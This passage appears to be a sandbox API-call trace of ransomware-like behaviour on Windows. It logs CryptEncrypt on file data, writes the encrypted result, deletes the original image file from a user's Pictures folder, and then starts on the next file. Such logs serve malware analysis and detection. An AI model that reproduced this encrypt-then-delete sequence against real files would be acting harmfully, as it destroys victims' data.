lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0087.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0087.836] CryptEncrypt (in: hKey=0x41ac780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49ae650*, pdwDataLen=0x144e790*=0x1463f, dwBufLen=0x14640 | out: pbData=0x49ae650*, pdwDataLen=0x144e790*=0x14640) returned 1 [0087.837] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.837] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.837] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.839] WriteFile (in: hFile=0x258, lpBuffer=0x452a658*, nNumberOfBytesToWrite=0x14640, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x452a658*, lpNumberOfBytesWritten=0x144f194*=0x14640, lpOverlapped=0x0) returned 1 [0087.841] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0087.841] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0087.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca418, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0087.841] CryptDestroyKey (hKey=0x41ac780) returned 1 [0087.842] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.842] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0087.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0087.842] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0087.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.842] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0087.842] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0087.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0087.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796e08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0087.842] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0087.842] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0087.842] FreeLibrary (hLibModule=0x756e0000) returned 1 [0087.842] CloseHandle (hObject=0x298) returned 1 [0087.842] CloseHandle (hObject=0x258) returned 1 [0087.850] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp", lpFilePart=0x0) returned 0x2d [0087.850] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ey_msasct-tppgup.bmp")) returned 0x20 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2280 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391bd0 [0087.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.851] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66b95a40, ftCreationTime.dwHighDateTime=0x1d5ed44, ftLastAccessTime.dwLowDateTime=0xe0c46f90, ftLastAccessTime.dwHighDateTime=0x1d5e287, ftLastWriteTime.dwLowDateTime=0xe0c46f90, ftLastWriteTime.dwHighDateTime=0x1d5e287, nFileSizeHigh=0x0, nFileSizeLow=0x1463f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="eY_MSASCT-tpPguP.bmp", cAlternateFileName="EY_MSA~1.BMP")) returned 0x41ac100 [0087.851] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\eY_MSASCT-tpPguP.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\ey_msasct-tppgup.bmp")) returned 1 [0087.897] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66b95a40, ftCreationTime.dwHighDateTime=0x1d5ed44, ftLastAccessTime.dwLowDateTime=0xe0c46f90, ftLastAccessTime.dwHighDateTime=0x1d5e287, ftLastWriteTime.dwLowDateTime=0xe0c46f90, ftLastWriteTime.dwHighDateTime=0x1d5e287, nFileSizeHigh=0x0, nFileSizeLow=0x1463f, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="eY_MSASCT-tpPguP.bmp", cAlternateFileName="EY_MSA~1.BMP")) returned 0 [0087.897] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0087.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0087.897] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ad0 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0087.898] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0087.898] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b60 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0087.898] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0087.898] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.898] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0087.899] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0087.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0087.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b60 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0087.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0087.899] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9660 [0087.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0087.899] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0087.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0087.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9890 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0087.900] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21f0 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0087.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0087.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0087.900] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2280 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0087.900] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.900] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0087.901] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\fW_IRtjvKhZB-.bmp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c9ef0, ftCreationTime.dwHighDateTime=0x1d5e33b, ftLastAccessTime.dwLowDateTime=0x3d10c320, ftLastAccessTime.dwHighDateTime=0x1d5ed46, ftLastWriteTime.dwLowDateTime=0x3d10c320, ftLastWriteTime.dwHighDateTime=0x1d5ed46, nFileSizeHigh=0x0, nFileSizeLow=0x19ab, dwReserved0=0x10189fc, dwReserved1=0x8, cFileName="fW_IRtjvKhZB-.bmp", cAlternateFileName="FW_IRT~1.BMP")) returned 0x41ac180 [0087.901] FindClose (in: hFindFile=0x41ac180 | out: hFindFile=0x41ac180) returned 1 [0087.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0087.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf770 | out: hHeap=0x1780000) returned 1 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0087.901] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0087.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0087.901] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0087.901] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0087.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d88 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0087.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d98 [0087.902] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2290 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0087.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0087.902] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0087.902] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0087.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391c08 | out: hHeap=0x1780000) returned 1 [0087.902] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e22f0 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf798 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cc8 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2190 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0087.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2190 | out: hHeap=0x1780000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0087.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2220 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0087.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e18 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2190 [0087.903] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0087.903] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0087.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0087.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0087.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0087.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0087.904] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0087.904] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0087.905] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0087.905] RtlAllocateHeap 